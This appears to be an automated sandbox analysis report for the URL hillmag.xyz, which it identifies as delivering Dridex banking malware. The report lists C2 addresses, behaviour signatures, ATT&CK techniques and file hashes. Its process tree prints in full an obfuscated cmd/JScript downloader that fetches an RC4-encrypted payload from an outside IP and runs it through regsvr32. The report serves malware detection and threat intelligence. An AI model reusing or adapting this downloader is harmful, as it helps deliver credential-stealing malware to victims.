Overview

overview

10

Static

static

URLScan

urlscan

http://hillmag.xyz/

windows7_x64

1

http://hillmag.xyz/

windows7_x64

6

http://hillmag.xyz/

windows7_x64

1

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

windows10_x64

10

http://hillmag.xyz/

linux_amd64

Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10-ja-20210920
  • submitted
    30-09-2021 23:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://hillmag.xyz/

  • Sample

    210930-3w5mjaafdj

Score
10/10
dridex10111botnetdiscoveryevasionpersistencetrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

185.168.130.138:443

79.172.255.198:9676

195.154.108.109:10172
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Registers COM server for autorun 1 TTPs
    persistence
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Modifies registry class 44 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3188
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3188 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3076
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?NDIwMTQx&OjmSVUSL&fhfghddfsdf=shuffle&cxssdvxcv=107hone.88pp109.406p7d2s0&sdfsdfdfg=diet&ogfgafgn4=wHzQMvXcJwDMFYPJKeXD&dsfdffg43t=T6NbP0fOH0SD2MjN2LHQRcHsLlni0OrBDV2rtl7yQluC_KAsJOBWNVbljk3VKQRlmIwLAVoTpfiv3EDczEeYgcSH9SWOYwl1otKWJA&YJOAtRMDIMjE0MTc=" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4284
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?NDIwMTQx&OjmSVUSL&fhfghddfsdf=shuffle&cxssdvxcv=107hone.88pp109.406p7d2s0&sdfsdfdfg=diet&ogfgafgn4=wHzQMvXcJwDMFYPJKeXD&dsfdffg43t=T6NbP0fOH0SD2MjN2LHQRcHsLlni0OrBDV2rtl7yQluC_KAsJOBWNVbljk3VKQRlmIwLAVoTpfiv3EDczEeYgcSH9SWOYwl1otKWJA&YJOAtRMDIMjE0MTc=" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:4248
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c 9wjrz.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1344
            • C:\Users\Admin\AppData\Local\Temp\9wjrz.exe
              9wjrz.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1580
  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"
    1⤵
    • Modifies registry class
    PID:4656

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    d302a1fb716166b280c2accd4491966e

    SHA1

    9eff2394f8616a4567f3eb895747ddf81fa68207

    SHA256

    ce29369602f384184b8fc7be24fa322fe70da4590f73921eada2cf12774a4afc

    SHA512

    c2b90c30f558518426cd0135a06dfc7d1c986635a9effffa34af80a8adaf566002d17288409b838452510212f774f5b75f2772e4acc20d7b19ad6f99751dc9ea

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    ee27379691c805b6a66afa8c6e075d70

    SHA1

    f97c538070eb49c60829f33ee5a93cc57ddcafb0

    SHA256

    628325f522ae3a57cbce3bb4d155b00a095209cb2d734faf86ca89e26d3466b7

    SHA512

    73cdb531518ab6bb5d3799f83819b166aadc361aa64f9fe24b753354972e2a5b0e87a3446008a87cf2c15a7a8fc1663f2d2fb151313817283e05b8b42dbcb4f3

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LYO6N8FE.cookie
    MD5

    0029006af4990599d075d04c9bbaf65f

    SHA1

    1da6f0041cb00ac64023aa0504942dd0e20dbfea

    SHA256

    31a92151e86123cf11d486d896493682c71569508fbfb7df7b95fc51275d1506

    SHA512

    da11226ee7efd9b25a686479a1dcf0707e28b0fc4df5827e9698ad3bb374c91044d6f4c71e9cf43bc3b19dc26fb33481dfde02ce54cd53cd838c0d817d169fc5

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\OH1JPHSC.cookie
    MD5

    6e404b82298e2b9513b18a7da39d6289

    SHA1

    1f7aa1488709ec3768459732465647478270d18f

    SHA256

    f6d0206cc0b0438b2ba80b9382a873396afe89100a72b7a60c1f156738c11e23

    SHA512

    0be86092154a5f8a358e03979ab0c01a464d7da4d38ff535afe9675b1ad0d4fbcf91c863722460a896b65e21bcc63a118766cbbb1794981a27263fb1507776a2

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\9wjrz.exe
    MD5

    f2732682a214f0598ceaf44cc0ed346c

    SHA1

    e05362dd29050def13a63018583dd55c0cb26709

    SHA256

    724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c

    SHA512

    4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\9wjrz.exe
    MD5

    f2732682a214f0598ceaf44cc0ed346c

    SHA1

    e05362dd29050def13a63018583dd55c0cb26709

    SHA256

    724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c

    SHA512

    4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6

    Download Submit
  • memory/1344-120-0x0000000000000000-mapping.dmp
    Download
  • memory/1580-124-0x0000000002000000-0x000000000203C000-memory.dmp
    Filesize

    240KB

    Download
  • memory/1580-125-0x0000000000400000-0x00000000004F9000-memory.dmp
    Filesize

    996KB

    Download
  • memory/1580-121-0x0000000000000000-mapping.dmp
    Download
  • memory/3076-116-0x0000000000000000-mapping.dmp
    Download
  • memory/3188-115-0x00007FF90FBB0000-0x00007FF90FC1B000-memory.dmp
    Filesize

    428KB

    Download
  • memory/4248-118-0x0000000000000000-mapping.dmp
    Download
  • memory/4284-117-0x0000000000000000-mapping.dmp
    Download